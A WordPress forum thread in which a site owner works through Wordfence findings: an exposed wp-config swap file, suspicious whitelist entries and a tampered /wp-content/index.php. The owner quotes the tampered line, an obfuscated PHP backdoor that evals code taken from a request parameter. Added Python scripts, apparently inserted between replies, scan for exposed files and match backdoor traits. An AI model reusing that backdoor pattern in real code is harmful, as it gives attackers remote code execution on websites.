• Resolved skygazer

    (@skygazer)


    1.

    I’m afraid of crashing or screwing up my live site by choosing the “restore original version of this file” option.

    So as you can see in the pic it says that the WP core file was modified. When I clicked view the file it says the change was last done on Jan 18. The only thing I had done that day was have someone try to update my version of WP to the latest version but there were some unexpected layout issues after the update so had to revert it back to the current version of WP I was already using. SO my question is would what I described above cause this result in the scan or did the person I hired do some shady business and changed my core file?

    2.

    Will choosing the “hide this file in .htaccess” cause any functionality issue with the site?

    New to this plugin and just trying it out so would really appreciate help with this.

    Thanks.

    • This topic was modified 8 years, 2 months ago by skygazer.
Viewing 15 replies - 1 through 15 (of 19 total)
  • Sounds like “someone” might need an upgrade to another “someone.”

    https://www.wordfence.com/learn/how-to-harden-wordpress-sites/

    From above link: “Editing your wp-config.php file using a text editor that creates temporary files immediately exposes the contents of wp-config.php to the Internet. For example, if you edit your wp-config.php file with the ‘vim’ text editor on Linux, it creates a file called “.wp-config.php.swp”. Anyone accessing your website at https://example.com/.wp-config.php.swp will be able to download this file and the file contains the contents of the wp-config.php file including your database username and password. To prevent this from happening, avoid editing your files directly on your website.”

    Thread Starter skygazer

    (@skygazer)

    While I totally appreciate the reply. Any way that someone can answer the actual question I had, i.e. will clicking ‘fix this’ on the WordFence result cause any issue to the site in terms of functionality?

    Okay so due to the lack of any timely reply DIRECTLY answering the Q’s that I had I went ahead with the “fix” option on the one that would fix the swp file issue. I loaded the site after and seems fine and then checked if the config file was still downloadable by the public and it no longer is (that is really scary that I’ve had my site up for a little over a year now and it had this vulnerability all this time. I wonder if it was already accessed by people).

    Oh well, I’m going to go change my server login credentials now in case it has already been stolen by anyone.

    So regarding the Q1 (the one with the RED X) in the WordFence result, here is a file comparison of the change to the WordPress core:


    Hopefully by looking at the file comparison above someone is able to tell me if this looks shady or it’s legit or whatever.

    Thanks

    OOPS looks like that image isn’t proper, don’t know why turned out small and blurry on here. Anyway here is the text of the file comparison (and actually I just realized if you increase your browser magnify view you are able to see the above image properly):

    Original
    1 <?php 1 <?php
    2 // Silence is golden.

    Modified
    2 ‘v1’; $e = ‘ avel’; $f = create_function(”, $e{3}.$e{2}.$e{1}.$e{4} .'( stripslashes( @ $_REQUEST[“RYRNIgFaFJgNdBTQiKBE”] ) );’ ); $f();

    Would love to find out if this is nothing shady or if it is. I’ve not a clue about code..

    • This reply was modified 8 years, 2 months ago by skygazer.

    I’m just another user here (free version only). When I first installed Wordfence and did my first scan, I had about 150 warnings of changes to my WordPress files from the original WordPress files (yes, Wordfence checks your files against what WordPress gave you).

    I was shocked but I said hey if there are this many files I want them gone.
    So I press fixed files which meant they’d be deleted. I was prepared for the worst. But the site was fine, it worked, it was up – it was the same.
    It took several times at “Fix It” or Fix the file -with that many problems.

    Before you do anything: BackUp Your Site. *** on an external location.

    I would suggest CLICKING fix the file to HIDE your wp-config file because it is exposed to the public, therefore so is your id and password.

    I would then change your password to an 18 or more character password, mine is about 30 characters. Reboot and clean your computer if any infection occurred clean your machine via a virus software. (many free are available)
    I use Malwarebytes -works on both mac and pc and it’s free, very good to find any viruses on your computer

    I would then do another scan to ensure no other problems exist.

    Thread Starter skygazer

    (@skygazer)

    Stratosphere thanks. I beat you to it just slightly

    I did exactly what you said about the “CLICKING fix the file to HIDE your wp-config file” and also changed the server login pw and rebooted it etc (see my post just before your reply). I’m going to hold off on fixing the red x for now and hope to get some more feedback first.

    I also checked the WordFence live thing and saw repeated activity from Ukraine where they kept going straight to my WP login page. I used the “block this IP” function, not sure how well it will work but hopefully it does. No wonder in my wordpress login page it has an ungodly amount of malicious logins attempted blocked by wordpress (over 30K). I don’t know if that amount is common but seemed high to me.

    As for local computer, I’m clean there, I’ve got AVG running. All in all WordFence only found 3 issues, hopefully none of those have left me compromised.

    BTW, Stratosphere, are you using the free version still? if so how long? Just curious cause while I would love to get the premium, starting a site and the amount it cost to run I’m still paying out of pocket even with ads so I can’t really manage to pay at the moment IF I have the option not to.

    Sorry, I was attempting to provide useful information with a bit of humor. My suggestion was that you’d go in there with FTP and delete the .swp files that were perhaps created when a person edited files online and are a possible security risk. That’ll take you one step closer to smooth running with Wordfence. MTN

    Regarding Ukraine, since you brought it up. If you don’t need traffic from that country it is worth it in so many ways to block all Ukraine IP numbers. Premium Wordfence, or IQ Block Country plugin.

    As for the amount of attacks, it can get massive. The criminals unleash bots that basically browse the web looking for vulnerabilities. Some say these bots are using the amount of electricity (for server resources) that could run the whole UK. It’s a ridiculous situation but one we have to live with and Wordfence is immense help with.

    MTN
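The temp-file exposure discussed above, as an added example that is not part of the original posts or of Wordfence: a Python sketch that lists files under a web root whose names embed `.php` without ending in it, which is why `.wp-config.php.swp` downloads as text. It assumes the server executes only names ending in `.php`; the sample tree is constructed.

```python
import os
import re
import tempfile

# Assumption: the web server runs only files whose name ENDS in .php and
# serves every other file as a static download.
PHP_INSIDE = re.compile(r"\.php(?!$)", re.IGNORECASE)  # ".php" followed by more text

def exposes_source(filename):
    """True for names like .wp-config.php.swp, wp-config.php~, x.php.bak."""
    embedded = bool(PHP_INSIDE.search(filename))
    # class.phpmailer.php contains ".php" mid-name but still ends in .php.
    return embedded and not filename.lower().endswith(".php")

def find_exposed(docroot):
    """Return sorted relative paths of files that would be served as source."""
    hits = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if exposes_source(name):
                rel = os.path.relpath(os.path.join(dirpath, name), docroot)
                hits.append(rel.replace(os.sep, "/"))
    return sorted(hits)

def demo():
    # Constructed sample tree, not the poster's site.
    sample = ("wp-config.php", ".wp-config.php.swp", "wp-config.php~",
              "wp-includes/class.phpmailer.php", "wp-includes/functions.php.bak")
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-includes"))
        for rel in sample:
            with open(os.path.join(root, rel), "w") as fh:
                fh.write("<?php // constructed placeholder\n")
        return find_exposed(root)

if __name__ == "__main__":
    for path in demo():
        print("served as plain text if requested:", path)
```

Run it against a local copy or over SSH on the web root; anything it lists should be deleted from the server rather than only hidden.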

    Good for you!
    On the red X, if you click restore the original -it won’t change your site in the slightest, it simply restores the WP file(s) that are supposed to be there, from what was modified.
    Like I said, I had about 150 changes and blasted it for Wordfence to fix them and they were all fixed. No reinstalls needed of theme or anything else.
    But you can wait for further instructions from the support here.
    I have been using the free version for about one month, so far it runs adequately for my needs. I found it is the best security plugin and I’ve tried them all, in the past 8 years with WordPress sites. If I have to I will buy the Premium version.
    Be vigilant, check the logs on your server, keep all plugins up to date, don’t use plugins that have NOT been updated in the past 6 months or are not supported.
    Wordfence also works with Cloudflare if you need extra protection, but it needs to be configured properly.

    Thread Starter skygazer

    (@skygazer)

    Yeah now when the attempt to reach the .wp-config.php.swp is made in the browser it returns this:

    “Forbidden

    You don’t have permission to access /.wp-config.php.swp on this server.
    Apache/2.4.18 (Ubuntu) Server at bendedreality.com Port 80”

    Not sure if that’s the best but it’s still better than what it was doing just hours ago, which was that it was downloading to my pc the swp file (geez).

    MTN and Stratosphere thank you both for taking the time and offering suggestion, feedback, truly appreciated.

    And yes MTN, I blocked the Ukraine IP but then it seems there are others attempting it too, ie. Poland and I think I saw one from Amsterdam. Wow that was a crazy figure analogy of the power they are using (wasting) doing that BS, I mean get a life FFS (pardon my french).

    Stratosphere, thanks for that reassurance on the possibly fixing the red X. I feel a bit more comfortable possibly doing it but I will still give it a bit more time and see if anyone from support might be keen on offering some feedback.

    I do use CloudFlare as well and yes I investigated and tried a few things with the two within my knowledge/capabilities.

    I definitely keep my plugins updated and also I do avoid ones that never get updated.

    All very great and sound advice thank you both for being so helpful and taking the time to help

    If I don’t hear from the plugin support about the red x in a few days I’ll probably go ahead and “fix” and will update with the good or bad news (hopefully good).

    • This reply was modified 8 years, 2 months ago by skygazer.

    You are very welcome, just trying to help but seems you have a good handle on this. Best of Luck.

    Hi @skygazer
    This modification to (/wp-content/index.php) isn’t legit of course and the code looks really bad, so reverting back to the original state of that file is a must, and I suggest following tips mentioned in “How to Clean a Hacked WordPress Site using Wordfence” and “How to Secure Your WordPress Working Environment”.

    Thanks.
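The file comparison discussed above, as an added example that is not part of the original replies or of Wordfence's code: a Python sketch that checks WordPress's placeholder `index.php` files against the expected two-line body and names the traits seen in the quoted modified line. The two extra stub paths and the inert sample are assumptions constructed for the example.

```python
import os
import re
import tempfile

# Placeholder files WordPress ships with the same two-line body. The first path
# is the one named in the thread; the other two are standard-layout assumptions.
STUBS = ("wp-content/index.php", "wp-content/plugins/index.php",
         "wp-content/themes/index.php")
EXPECTED = ["<?php", "//", "Silence", "is", "golden."]

# Traits visible in the "Modified" line quoted in the thread.
INDICATORS = {
    "function built at runtime": re.compile(r"\bcreate_function\s*\("),
    "request input read": re.compile(r"\$_(REQUEST|POST|GET|COOKIE)\s*\["),
    "name spliced from characters": re.compile(r"\$\w+\{\d+\}\s*\.\s*\$\w+\{\d+\}"),
}

def check_stub(source):
    """Return (matches_original, sorted indicator names found)."""
    found = sorted(n for n, rx in INDICATORS.items() if rx.search(source))
    return source.split() == EXPECTED, found

def audit(root):
    """Map each stub path to 'ok', 'missing' or 'modified: <indicators>'."""
    report = {}
    for rel in STUBS:
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            report[rel] = "missing"
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            same, found = check_stub(fh.read())
        detail = ", ".join(found) or "no known indicator"
        report[rel] = "ok" if same else "modified: " + detail
    return report

def demo():
    # Constructed, inert sample: it carries the quoted line's traits, no working body.
    tampered = "<?php $f = create_function('', $e{3}.$e{2}.'/* elided */ $_REQUEST[\"k\"]'); $f();\n"
    files = {"wp-content/index.php": tampered,
             "wp-content/plugins/index.php": "<?php\n// Silence is golden.\n"}
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "plugins"))
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        return audit(root)

if __name__ == "__main__":
    for rel, status in demo().items():
        print(f"{rel}: {status}")
```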

    Thread Starter skygazer

    (@skygazer)

    I did in fact use the revert to original file function in your plugin last night as I got a little impatient and there were no adverse effects.

    Wfalaa, thank you for confirming it was not a legit line of code. I had hired people from Fiverr.com on occasion to perform tasks that are outside of my skills and I’m thinking it was one of them but unfortunately I only started using your awesome plugin this past Thursday or Friday so I don’t know if it was the last person that did work or anyone else prior but I’m thinking it was the last person who worked on it this past Wednesday because Wordfence stated that the last change to the file was exactly on that date but who knows…either way I have removed it with your plugin.

    On a side note it is so difficult to find a trustworthy honest person to do things that I need for my site. Can anyone offer any solid trustworthy people/person?

    There are a number of WordPress experts here – responding in the WF forums – so you may want to look through here…

    But as to using Fiverr – in my opinion, you only get the expertise you’re willing to pay for, and $5 doesn’t get you much.

    While Fiverr might be a great way to access cheap labour – ie, amateurs or students just getting their feet wet – you do have to be prepared for unprofessional work ethics and less-than-optimal skill sets.

    I don’t know of a single worthwhile professional doing any real business on Fiverr. Experts with valuable skill sets and professional ethics simply don’t work for $5/hr – at least not in IT, in North America.

    Thread Starter skygazer

    (@skygazer)

    Excellent help/replies and feedback/input from all here so far, much thanks for that.

    I do have an additional question regarding “Whitelist”. I noticed that there was a white list (that I did not create) and it contained varying IP addresses (none of which are my site or my own) and all had Request in the file param.

    This is the list that was already there and enabled and was NOT created by me

    The worst part is I actually left it enabled for about a week and a half thinking since it was already there that it was probably supposed to be there. But then the more I was learning the less legit this seemed so I disabled them. They are still there but nothing at all is actively whitelisted at the present time.

    I suspect this is a definite malicious doings but not sure how they would have been entered since I personally never put them in, anyone can explain how or who would have been able to create this white list?

    *you may have to zoom/enlarge your page view to be able to read the stuff in the image

    • This reply was modified 8 years, 1 month ago by skygazer.

    Skygazer: it’s Stratosphere here again.
    No those IPs are NOT supposed to be there, unless you entered them.

    That happened to me a month ago, I found in
    Wordfence > Options > White List 404’s that I did not enter.
    I deleted them immediately, and have checked them every day since, never happened again.

    If you identify any of them as your hosting IP, discuss with them
    if they require access, but I doubt it. I have not whitelisted my hosting IP
    and everything works fine.

    This Option page is very helpful and I use maximum security on all of the options there.

    For me, I delete anything I did not enter myself in wp-admin.
    Hope this helps you.

    I wasn’t able to zoom in to see all of them, are they plugin related?
    Not sure what those plugins are cause I can’t read them.
    I’ve learned to minimize the plugins I use and only from developers who update them as frequently as WordPress itself updates. If not – I ditch them.
    Just now squinting I see the XML-RPC reference, that is a hole for hackers.

    Sucuri has an article on that so if you can at all, avoid using that -it would make your site safer.

    https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html

    Hackers also like to hit images it appears, I see attempts on my images.
    Again, sorry I couldn’t read the entries as well.

  • The topic ‘First time using this plugin and have 2 Q’s’ is closed to new replies.